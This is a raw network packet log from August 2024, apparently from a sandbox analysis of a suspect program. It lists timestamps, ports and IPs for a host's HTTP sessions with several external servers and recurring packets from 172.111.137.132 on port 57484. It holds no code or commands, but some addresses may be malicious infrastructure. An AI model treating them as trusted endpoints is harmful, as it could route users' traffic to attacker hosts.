                                                            Aug 28, 2024 14:02:33.514138937 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.514692068 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514710903 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514722109 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514733076 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514743090 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.514758110 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.514775038 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.634392023 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634407043 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634417057 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634454966 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634464979 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634475946 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634476900 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.634510994 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634514093 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.634524107 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634555101 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634566069 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.634567976 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.634603977 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.635283947 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635329008 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635339022 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635349989 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635369062 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.635389090 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.635420084 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635432005 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635442019 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635454893 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.635462046 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.635499954 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.636235952 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.636251926 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.636287928 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.755429983 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755461931 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755472898 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755491972 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755506992 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755544901 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.755546093 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755558014 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755567074 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.755573034 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755616903 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.755640984 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755652905 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.755681038 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.755702019 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756220102 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756243944 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756263018 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756279945 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756392002 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756403923 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756422043 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756433010 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756433964 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756444931 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756449938 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756485939 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756848097 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756874084 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756885052 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756891966 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756918907 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.756944895 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756957054 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756968975 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756978989 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.756985903 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.757009983 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.875790119 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.875936031 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.875946999 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.875958920 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.875968933 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.875979900 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876084089 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.876226902 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876238108 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876249075 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876261950 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876279116 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.876300097 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.876526117 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876704931 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876717091 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876728058 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876738071 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876748085 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876763105 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.876777887 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.876833916 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876844883 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876848936 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876854897 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.876876116 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.876904011 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.877800941 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877813101 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877825022 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877835035 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877846003 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877856970 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877856016 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.877880096 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.877897024 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.877943993 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.877980947 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.996716976 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996747017 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996759892 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996772051 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996782064 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996803045 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996814966 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996841908 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996876955 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.996913910 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996923923 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.996926069 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996938944 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996942997 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.996952057 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996965885 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996977091 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.996989965 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.997006893 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.997019053 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.997823000 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997834921 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997847080 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997867107 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997875929 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997888088 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997889042 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.997900009 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997919083 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.997961044 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997972012 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997982979 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.997987032 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.998022079 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.998742104 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998754978 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998765945 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998804092 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998809099 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.998815060 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998821974 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.998828888 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998842955 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998853922 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:33.998858929 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:33.998900890 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.117522001 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117542982 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117553949 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117572069 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117584944 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117595911 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117608070 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117619991 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117631912 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117646933 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117665052 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.117690086 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117705107 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117711067 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.117717981 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117727041 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.117731094 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117748022 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.117753029 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.117782116 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.118576050 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118627071 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.118742943 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118755102 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118766069 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118784904 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.118798018 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.118812084 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.118937016 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118948936 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118962049 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118973017 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.118980885 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.118988037 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.119002104 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.119009972 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.119014978 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.119024992 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.119048119 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.119278908 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.119318962 CEST4974480192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:34.119343042 CEST8049744193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:34.119354963 CEST8049744193.25.216.165192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 14:02:34.119368076 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.119383097 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.119391918 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.119405985 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.119417906 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.119427919 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.119440079 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.119452000 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.119453907 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.119469881 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.119474888 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.119498968 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.119514942 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240216017 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240231037 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240242004 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240253925 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240329027 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240329027 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240348101 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240360975 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240361929 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240375996 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240382910 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240389109 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240401030 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240411997 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240417004 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240428925 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240432978 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240449905 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240475893 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240487099 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240500927 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240510941 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240523100 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240524054 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240536928 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240540028 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240559101 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240582943 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240762949 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240793943 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240942955 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240956068 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240967035 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240979910 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240983963 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.240993023 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.240998983 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241007090 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241027117 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241041899 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241086960 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241099119 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241111040 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241121054 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241122007 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241132975 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241136074 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241147995 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.241151094 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241167068 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.241189957 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.242590904 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.242620945 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:34.242660046 CEST | 49744 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:34.249741077 CEST | 80 | 49744 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:54.224277973 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:02:54.232137918 CEST | 49738 | 57484 | 192.168.2.4 | 172.111.137.132
Aug 28, 2024 14:02:54.236922026 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:03:08.479604006 CEST | 49745 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:08.487529039 CEST | 80 | 49745 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:08.489622116 CEST | 49745 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:08.492166042 CEST | 49745 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:08.496889114 CEST | 80 | 49745 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:08.969852924 CEST | 80 | 49745 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:08.969886065 CEST | 80 | 49745 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:08.970057964 CEST | 49745 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:08.973001957 CEST | 49745 | 80 | 192.168.2.4 | 3.33.130.190
Aug 28, 2024 14:03:08.977904081 CEST | 80 | 49745 | 3.33.130.190 | 192.168.2.4
Aug 28, 2024 14:03:24.255563021 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:03:24.261626005 CEST | 49738 | 57484 | 192.168.2.4 | 172.111.137.132
Aug 28, 2024 14:03:24.266561985 CEST | 57484 | 49738 | 172.111.137.132 | 192.168.2.4
Aug 28, 2024 14:03:24.369613886 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:24.374643087 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:24.379448891 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:24.379448891 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:24.387510061 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.070198059 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.070369959 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.070375919 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.070543051 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.071247101 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.071254015 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.071345091 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.072491884 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.072498083 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.072594881 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.073668957 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.073676109 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.073765993 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.075182915 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.075387001 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.078080893 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.078140974 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.078299999 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.166068077 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.166102886 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.166341066 CEST | 80 | 49746 | 162.241.2.92 | 192.168.2.4
Aug 28, 2024 14:03:25.166342974 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.366066933 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
Aug 28, 2024 14:03:25.881781101 CEST | 49746 | 80 | 192.168.2.4 | 162.241.2.92
